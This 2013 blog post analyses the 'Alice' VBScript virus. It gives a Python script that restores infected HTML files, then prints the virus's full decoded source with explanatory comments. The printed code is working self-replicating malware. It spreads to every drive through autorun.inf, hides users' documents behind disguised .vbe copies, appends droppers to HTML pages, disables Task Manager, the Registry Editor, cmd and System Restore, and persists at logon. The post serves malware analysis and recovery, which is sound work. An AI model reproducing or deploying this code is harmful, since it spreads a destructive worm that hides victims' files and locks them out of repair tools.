Tuesday, 2 July 2013

An Alice Virus analysis by script-kid.


Do not EXECUTE this code on your everyday Windows machine. If you want to reproduce the analysis, run it only inside an isolated, disposable virtual machine with no shared drives, no removable media and no network access: the script writes itself to every removable, fixed and network drive it can see.

I got an Alice Virus from e-mail.

It is a virus which:
    Drops an ~8 KB .vbe copy of itself next to every .doc, .docx and .rtf file and hides the original document.
    Rewrites every .htm and .html file as an .hta that carries the original page plus an appended VBScript dropper for the virus.
    Is obfuscated with the Microsoft Script Encoder (it is launched with `wscript.exe //e:vbscript.encode`); it can be decoded with scrdec18.
Deletes the .lnk shortcuts in the user's Recent folder.
Modifies and deletes Windows registry values: it disables Task Manager, the Registry Editor, cmd.exe, Run, Find, Folder Options and System Restore, hides file extensions, makes .vbe files look like Word documents, and adds itself to Winlogon\Userinit for persistence.
Writes an autorun.inf into the root of every drive so that its alice.alc copy is launched when the drive is opened.
Installs itself as alice.sys in %SystemRoot%\System32\drivers\ and as alice.alc in the root of every removable, fixed and network drive (in the script: drive types 1–3, with A: excluded).

Microsoft Security Essentials detects and removes the virus, but it does not restore the .html files that were converted to .hta.

First, I wrote a program to recover the html files:
    It counts occurrences of the string "alice.tmp" in each .hta file; I re-ran it until no file contained "alice.tmp" any more.
    When I fixed the infected files, none of my own files legitimately contained the string "alice.tmp", so that string serves as the infection marker.
    Each injected block contains "alice.tmp" twice, so I removed (5 × (count of "alice.tmp" / 2)) lines from the end of each .hta file (the listing below uses 6 because its line counter also counts the final empty read at end-of-file).
    Then I renamed each file from .hta back to .html.
Second, I installed Microsoft Security Essentials and removed the Alice virus.
Last, I reset the attributes of the doc, docx and rtf files (cleared the hidden / system / read-only flags the virus had set),
    and restored the registry values it had changed.

Here is the hta2html source code (Python). Note that it walks every mounted volume and, as written, treats every .hta file it finds as infected.
 import os  
 import re  
   
 def os_walkf(root, filterDir=None, filterName=None, filterExt=None):
   """Yield full paths of the files under ``root`` that pass the filters.

   ``filterDir`` prunes the walk: sub-directories whose name it rejects are
   not descended into.  ``filterName`` is applied to the bare file name and
   ``filterExt`` to its extension in ``os.path.splitext`` form (e.g.
   ``".hta"``).  A filter left as ``None`` accepts everything.  Paths are
   yielded in ``os.walk`` order.
   """
   def accepted(fname):
     # Same short-circuit order as the original: name first, then extension.
     if filterName and not filterName(fname):
       return False
     if filterExt and not filterExt(os.path.splitext(fname)[1]):
       return False
     return True

   for base, subdirs, files in os.walk(root):
     if filterDir:
       # Assigning to the slice prunes the directories os.walk will visit.
       subdirs[:] = [d for d in subdirs if filterDir(d)]
     for fname in files:
       if accepted(fname):
         yield os.path.join(base, fname)
   
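 def set_countstring(path):
   """Return how many times the Alice payload was appended to ``path``.

   Each injected HTA block contains the string ``alice.tmp`` exactly twice
   (once to create the temp copy, once to run it), so the occurrence count
   halved is the number of infections.  The file is read as bytes so that a
   page in an arbitrary encoding cannot raise a decoding error, and integer
   division is used so the result is always an ``int`` (``/`` yields a
   float under Python 3, which then leaked into the line arithmetic of
   ``set_hta2html``).
   """
   with open(path, "rb") as fs:
     occurrences = fs.read().count(b"alice.tmp")
   return occurrences // 2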
     
   
 def set_filelen(fs):
   """Count the ``readline`` calls needed to exhaust the open file ``fs``.

   Note that this is the number of lines *plus one*: the final empty read
   that signals end-of-file is counted before the loop stops.
   ``set_hta2html`` relies on that offset, so it is preserved here.
   """
   return sum(1 for _ in fs) + 1
   
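 def set_hta2html(path):
   """Recover the original HTML page from an Alice-infected ``.hta`` file.

   The virus turns ``page.html`` into ``page.hta`` by appending, after a
   CRLF, a block of the form::

       <HTML>
       <SCRIPT language="VBScript">
       on error resume next:... \\alice.tmp ... \\alice.tmp ...
       </SCRIPT>
       </HTML>

   and everything from the first such block to end-of-file is payload (a
   page that gets re-infected simply receives further copies).  Rather than
   estimating how many trailing lines to drop, this locates the first
   injected block and truncates there, which restores the original bytes
   exactly regardless of how many times the page was hit or whether it
   originally ended with a newline.  The recovered content is written to
   ``<path minus .hta>.html`` beside the source; the ``.hta`` itself is
   left for the caller to remove.  If no marker is found the content is
   copied unchanged.
   """
   marker = re.compile(
     rb"\r?\n<HTML>\r?\n<SCRIPT language=\"VBScript\">\r?\n[^\r\n]*alice\.tmp"
   )
   # Binary mode: preserves the page's bytes and encoding untouched.
   with open(path, "rb") as fs:
     data = fs.read()
   hit = marker.search(data)
   if hit:
     data = data[:hit.start()]
   new_filename = path[:-3] + 'html'
   with open(new_filename, "wb") as new_fs:
     new_fs.write(data)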
     
   
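 def main():
   """Walk every mounted volume and convert Alice ``.hta`` files back to ``.html``.

   Volumes are taken from the output of ``mountvol /`` (the ``X:\\`` lines;
   the command is a fixed string, no user input reaches the shell).  Only
   ``.hta`` files that actually contain the injected marker ``alice.tmp``
   are touched: a legitimate HTML Application is reported and left alone
   instead of being rewritten and deleted.  Each infected file is recovered
   by ``set_hta2html`` and then removed.
   """
   drv = re.findall(r"[A-Z]+:.*$", os.popen("mountvol /").read(), re.MULTILINE)

   for drive in drv:
     for path in os_walkf(drive, filterExt=lambda ext: ext.lower() == ".hta"):
       with open(path, "rb") as fs:
         infected = b"alice.tmp" in fs.read()
       if not infected:
         print("skipped (no Alice marker): " + path)
         continue
       print(path)
       set_hta2html(path)
       os.remove(path)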
   
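 # Only run the cleanup when executed as a script, not when imported.
 if __name__ == "__main__":
   main()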
   
   

Here is the Alice virus code after decoding it with scrdec18 (do not run it). The five-character identifiers appear to be randomly generated obfuscation; the comments added below explain what each routine does.

#Alice virus
 ' Alice virus, decoded.  Global objects used throughout:
 '   f300e - Scripting.FileSystemObject (all file/attribute work)
 '   thpfp - WScript.Shell (registry reads/writes and launching processes)
 '   mxlcm - File object for the script that is currently running
 '   ye9ue - special folder 0 (the Windows folder; used for explorer.exe below)
 '   aixlb - special folder 1 (the System folder; used for wscript.exe and drivers\alice.sys below)
 option explicit
 dim f300e,thpfp,mxlcm,ye9ue,aixlb
 set f300e=createobject("Scripting.FileSystemObject")
 set thpfp=createobject("WScript.Shell")
 set mxlcm=f300e.getfile(wscript.scriptfullname)
 set ye9ue=f300e.getspecialfolder(0)
 set aixlb=f300e.getspecialfolder(1)
 ' Drop a copy of this script at ck1cp (via v41tf) and mark it
 ' read-only + hidden + system + archive (1+2+4+32 = 39) so it is
 ' neither listed nor easily deleted.  Errors are swallowed.
 sub ayfp6(ck1cp)
 on error resume next
 dim s41k8
 v41tf(ck1cp)
 set s41k8=f300e.getfile(ck1cp)
 s41k8.attributes=39
 end sub
 ' Propagation pass over every drive of type 1, 2 or 3 (removable, fixed
 ' and network in the FileSystemObject DriveType enumeration), skipping A:.
 ' For each drive: plant alice.alc in the root, write an autorun.inf that
 ' launches it, infect the root folder's files, then recurse into subfolders.
 sub f0l51()
 on error resume next
 dim bgw3u
 for each bgw3u in f300e.drives
 if (bgw3u.drivetype=1 or bgw3u.drivetype=2 or bgw3u.drivetype=3) and bgw3u.path<>"A:" then
 ayfp6(bgw3u.path&"\alice.alc")
 qag1n(bgw3u.path&"\autorun.inf")
 syasj(bgw3u.path&"\")
 rid6b(bgw3u.path&"\")
 end if
 next
 end sub
 ' Delete every .lnk shortcut in the user's Recent folder (shortcuts to
 ' recently opened documents, which would still point at the now-hidden
 ' originals).
 sub hy26l()
 on error resume next
 dim e9ljz,purpl
 for each e9ljz in f300e.getfolder(thpfp.specialfolders("Recent")).files
 purpl=lcase(f300e.getextensionname(e9ljz.path))
 if purpl="lnk" then
 zpzoe(e9ljz.path)
 end if
 next
 end sub
 ' Build the infected HTA: write the original page p9krq followed by an
 ' appended dropper to wzc5e.  The dropper is an <HTML><SCRIPT language="VBScript">
 ' block whose one long line carries this script's own source text as a
 ' string literal (every double quote swapped for chr(216) so it fits inside
 ' the literal; the HTA swaps them back at run time), writes it to
 ' <special folder 2 = Temp>\alice.tmp with a trailing chr(0), and launches
 ' it with <System>\wscript.exe //e:vbscript.encode.  The string "alice.tmp"
 ' therefore appears exactly twice per injected block, which is what the
 ' recovery script above counts.  Note the block is preceded by a CRLF, so
 ' everything from the first "<HTML>" of a block to end-of-file is payload.
 sub kugxq(p9krq,wzc5e)
 on error resume next
 dim qs247,zf3cw,a4zpt,u960a,kbkzd
 set qs247=f300e.opentextfile(p9krq,1)
 zf3cw=qs247.readall
 qs247.close
 set qs247=f300e.opentextfile(mxlcm,1)
 a4zpt=qs247.readall
 qs247.close
 u960a=replace(a4zpt,chr(34),chr(216))
 kbkzd=vbcrlf&"<HTML>"&vbcrlf&"<SCRIPT language="&chr(34)&"VBScript"&chr(34)&">"&vbcrlf&"on error resume next:set i129a=createobject("&chr(34)&"Scripting.FileSystemObject"&chr(34)&"):set uvqkz=createobject("&chr(34)&"WScript.Shell"&chr(34)&"):set ony43=i129a.getspecialfolder(1):set rowb1=i129a.getspecialfolder(2):p3vli="&chr(34)&u960a&chr(34)&":l3h0l=replace(p3vli,chr(216),chr(34)):esbvk=l3h0l&chr(0):set ivofa=i129a.createtextfile(rowb1&"&chr(34)&"\alice.tmp"&chr(34)&",true):ivofa.write(esbvk):ivofa.close:uvqkz.run(ony43&"&chr(34)&"\wscript.exe //e:vbscript.encode "&chr(34)&"&rowb1&"&chr(34)&"\alice.tmp"&chr(34)&")"&vbcrlf&"</SCRIPT>"&vbcrlf&"</HTML>"
 set qs247=f300e.createtextfile(wzc5e,true)
 qs247.write(zf3cw)
 qs247.write(kbkzd)
 qs247.close
 end sub
 ' Return the ProgID registered for file extension db04w, i.e. the default
 ' value of HKCR\.<ext> (e.g. the Word document class for "doc").
 function ljwom(db04w)
 ljwom=thpfp.regread("HKCR\."&db04w&"\")
 end function
 ' Endless re-infection loop: while this script is the installed copy
 ' <System>\drivers\alice.sys (mxlcm's default property, its path, is
 ' compared with that string) keep running the drive propagation pass.
 ' This is why recovered .html files get re-infected if the cleanup is
 ' run before the virus process is stopped.
 sub llgz8()
 on error resume next
 do while mxlcm=(aixlb&"\drivers\alice.sys")
 f0l51()
 loop
 end sub
 ' Install-or-run.  If <System>\drivers\alice.sys does not exist yet, drop
 ' a hidden/system copy there and start it with wscript.exe
 ' //e:vbscript.encode (the encoded-script engine).  Otherwise this is the
 ' installed copy: apply the registry lockdown (vs7xo), disguise .vbe files
 ' as documents (wcpw7), wipe Recent shortcuts (hy26l) and enter the
 ' propagation loop (llgz8), which does not return.
 sub m9g2p()
 on error resume next
 if not f300e.fileexists(aixlb&"\drivers\alice.sys") then
 ayfp6(aixlb&"\drivers\alice.sys")
 thpfp.run(aixlb&"\wscript.exe //e:vbscript.encode "&aixlb&"\drivers\alice.sys")
 else
 vs7xo()
 wcpw7()
 hy26l()
 llgz8()
 end if
 end sub
 ' Write an autorun.inf at fg77p whose shellexecute, open and explore
 ' verbs all run "wscript.exe //e:vbscript.encode alice.alc" (the copy
 ' planted in the same drive root by f0l51).  If the first write fails
 ' (e.g. an existing read-only/hidden autorun.inf) the file is force-deleted
 ' with zpzoe and written again.  Finally the file is marked
 ' read-only + hidden + system + archive (39).
 sub qag1n(fg77p)
 on error resume next
 dim btfzw,tmkuj
 btfzw="[autorun]"&vbcrlf&"shellexecute=wscript.exe //e:vbscript.encode alice.alc"&vbcrlf&"shell\open\command=wscript.exe //e:vbscript.encode alice.alc"&vbcrlf&"shell\explore\command=wscript.exe //e:vbscript.encode alice.alc"
 set tmkuj=f300e.createtextfile(fg77p,true)
 tmkuj.write(btfzw)
 tmkuj.close
 if err.number<>0 then
 zpzoe(fg77p)
 set tmkuj=f300e.createtextfile(fg77p,true)
 tmkuj.write(btfzw)
 tmkuj.close
 end if
 set tmkuj=f300e.getfile(fg77p)
 tmkuj.attributes=39
 end sub
 ' Recursively infect every subfolder of wib5969, skipping the RECYCLER
 ' and "System Volume Information" folders.  syasj handles the files in
 ' each folder; rid6b descends further.
 sub rid6b(wib5969)
 on error resume next
 dim zdet3
 for each zdet3 in f300e.getfolder(wib5969).subfolders
 if zdet3.name<>"RECYCLER" and zdet3.name<>"System Volume Information" then
 syasj(zdet3.path)
 rid6b(zdet3.path)
 end if
 next
 end sub
 ' Infect the files directly inside folder qo1qy:
 '  - .doc/.docx/.rtf (ignoring Office "~$" lock files): drop a copy of
 '    this script as <basename>.vbe beside the document (v41tf) and set the
 '    original to hidden + system + archive (vd8vs), so with extensions
 '    hidden and .vbe disguised (wcpw7) the copy looks like the document.
 '  - .htm/.html: write <basename>.hta containing the page plus the dropper
 '    (kugxq) and delete the original page (zpzoe).  .hta files are not
 '    matched here, so a given page is infected once per conversion.
 sub syasj(qo1qy)
 on error resume next
 dim vlx8c,tk8hq,eiklf,fbr9k
 for each vlx8c in f300e.getfolder(qo1qy).files
 tk8hq=lcase(f300e.getextensionname(vlx8c.path))
 eiklf=f300e.getbasename(vlx8c.path)
 if (tk8hq="doc" or tk8hq="docx" or tk8hq="rtf") and left(eiklf,2)<>"~$" then
 v41tf(qo1qy&"\"&eiklf&".vbe")
 vd8vs(vlx8c.path)
 elseif tk8hq="htm" or tk8hq="html" then
 kugxq(vlx8c.path),(qo1qy&"\"&eiklf&".hta")
 zpzoe(vlx8c.path)
 end if
 next
 end sub
 ' Copy this script's own text to watpl (overwriting).  If the write fails,
 ' force-delete whatever is at watpl (zpzoe clears attributes first) and
 ' retry once.  The bytes copied are whatever mxlcm contains, so copies
 ' stay in the same (encoded) form as the running script.
 sub v41tf(watpl)
 on error resume next
 dim ugn6h,jk5vz
 set ugn6h=f300e.opentextfile(mxlcm,1)
 jk5vz=ugn6h.readall
 ugn6h.close
 set ugn6h=f300e.createtextfile(watpl,true)
 ugn6h.write(jk5vz)
 ugn6h.close
 if err.number<>0 then
 zpzoe(watpl)
 set ugn6h=f300e.createtextfile(watpl,true)
 ugn6h.write(jk5vz)
 ugn6h.close
 end if
 end sub
 ' Hide the original document p3zu2: attributes 38 = hidden (2) + system (4)
 ' + archive (32).  Recovery means clearing these flags again.
 sub vd8vs(p3zu2)
 on error resume next
 dim p3fbg
 set p3fbg=f300e.getfile(p3zu2)
 p3fbg.attributes=38
 end sub
 ' Registry lockdown and persistence.  Every call is best-effort (on error
 ' resume next), so the HKLM writes - which normally need administrator
 ' rights - are silently skipped when they fail.
 '  Deletions (HKCR): the "Open With" context-menu handler; the Install verb
 '    for .inf files; the open command for .reg files (blocks double-click
 '    import of a repair .reg); the Open2 and Edit verbs of VBEFile, so the
 '    dropped .vbe copies cannot easily be opened for inspection.
 '  HKCU Explorer: Hidden=0 (presumably to keep hidden originals from being
 '    shown; 1 is "show hidden files"), HideFileExt=1 (so "report.vbe"
 '    displays as "report"), plus policies NoFileAssociate, NoFind,
 '    NoFolderOptions, NoRun, DisableRegistryTools, DisableTaskMgr and
 '    DisableCMD=2.
 '  HKLM: RegisteredOwner=ALICE / empty RegisteredOrganization (cosmetic tag);
 '    Winlogon\Userinit set to the normal userinit.exe followed by
 '    wscript.exe //e:vbscript.encode <System>\drivers\alice.sys, i.e. the
 '    virus starts at every logon; DisableSR and DisableConfig turn System
 '    Restore off so a restore point cannot undo the infection.
 ' Cleanup after removal means reverting each of these values.
 sub vs7xo()
 on error resume next
 thpfp.regdelete"HKCR\*\shellex\ContextMenuHandlers\Open With\"
 thpfp.regdelete"HKCR\inffile\shell\Install\command\"
 thpfp.regdelete"HKCR\inffile\shell\Install\"
 thpfp.regdelete"HKCR\regfile\shell\open\command\"
 thpfp.regdelete"HKCR\regfile\shell\open\"
 thpfp.regdelete"HKCR\VBEFile\Shell\Open2\command\"
 thpfp.regdelete"HKCR\VBEFile\Shell\Open2\"
 thpfp.regdelete"HKCR\VBEFile\Shell\Edit\command\"
 thpfp.regdelete"HKCR\VBEFile\Shell\Edit\"
 thpfp.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden","0","REG_DWORD"
 thpfp.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt","1","REG_DWORD"
 thpfp.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileAssociate","1","REG_DWORD"
 thpfp.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind","1","REG_DWORD"
 thpfp.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","1","REG_DWORD"
 thpfp.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun","1","REG_DWORD"
 thpfp.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","1","REG_DWORD"
 thpfp.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","1","REG_DWORD"
 thpfp.regwrite"HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD","2","REG_DWORD"
 thpfp.regwrite"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","ALICE"
 thpfp.regwrite"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization",""
 thpfp.regwrite"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",aixlb&"\userinit.exe,"&aixlb&"\wscript.exe //e:vbscript.encode "&aixlb&"\drivers\alice.sys"
 thpfp.regwrite"HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSR","1","REG_DWORD"
 thpfp.regwrite"HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableConfig","1","REG_DWORD"
 end sub
 ' Disguise .vbe files as Word documents: copy the .doc ProgID's default
 ' value (its type name) and DefaultIcon onto the .VBE ProgID, set the
 ' same name as FriendlyTypeName, and add NeverShowExt so Explorer never
 ' displays the .vbe extension.  Combined with the hidden originals, the
 ' dropped copies are indistinguishable from the documents they replace.
 sub wcpw7()
 on error resume next
 dim r0a7u,rwyg5
 r0a7u="HKCR\"&ljwom("doc")
 rwyg5="HKCR\"&ljwom("VBE")
 thpfp.regwrite rwyg5&"\",thpfp.regread(r0a7u&"\")
 thpfp.regwrite rwyg5&"\DefaultIcon\",thpfp.regread(r0a7u&"\DefaultIcon\")
 thpfp.regwrite rwyg5&"\FriendlyTypeName",thpfp.regread(r0a7u&"\"),"REG_EXPAND_SZ"
 thpfp.regwrite rwyg5&"\NeverShowExt",""
 end sub
 ' Decoy so the user sees what they expected.  ktl17 is this script's path
 ' with the 3-character extension stripped.  If this is the autorun copy
 ' (alice.alc) open an Explorer window on the drive; otherwise, if a
 ' .doc/.docx/.rtf with the same base name exists next to the .vbe, launch
 ' it through the shell\Open\command registered for that extension.
 sub xvhxt()
 on error resume next
 dim ktl17
 ktl17=left(mxlcm,len(mxlcm)-3)
 if mxlcm.name="alice.alc" then
 thpfp.run ye9ue&"\explorer.exe /e,/select,"&wscript.scriptfullname
 elseif f300e.fileexists(ktl17&"doc") then
 thpfp.run(thpfp.regread("HKCR\"&ljwom("doc")&"\shell\Open\command\")&chr(32)&chr(34)&ktl17&"doc"&chr(34))
 elseif f300e.fileexists(ktl17&"docx") then
 thpfp.run(thpfp.regread("HKCR\"&ljwom("docx")&"\shell\Open\command\")&chr(32)&chr(34)&ktl17&"docx"&chr(34))
 elseif f300e.fileexists(ktl17&"rtf") then
 thpfp.run(thpfp.regread("HKCR\"&ljwom("rtf")&"\shell\Open\command\")&chr(32)&chr(34)&ktl17&"rtf"&chr(34))
 end if
 end sub
 ' Force-delete yunj7: try a plain delete, and if that errors (typically a
 ' read-only/hidden/system file) clear all attributes and delete again.
 sub zpzoe(yunj7)
 on error resume next
 dim fbr9k
 f300e.deletefile(yunj7)
 if err.number<>0 then
 set fbr9k=f300e.getfile(yunj7)
 fbr9k.attributes=0
 f300e.deletefile(yunj7)
 end if
 end sub
 ' Entry point: show the decoy first, then install / propagate.
 xvhxt()
 m9g2p()
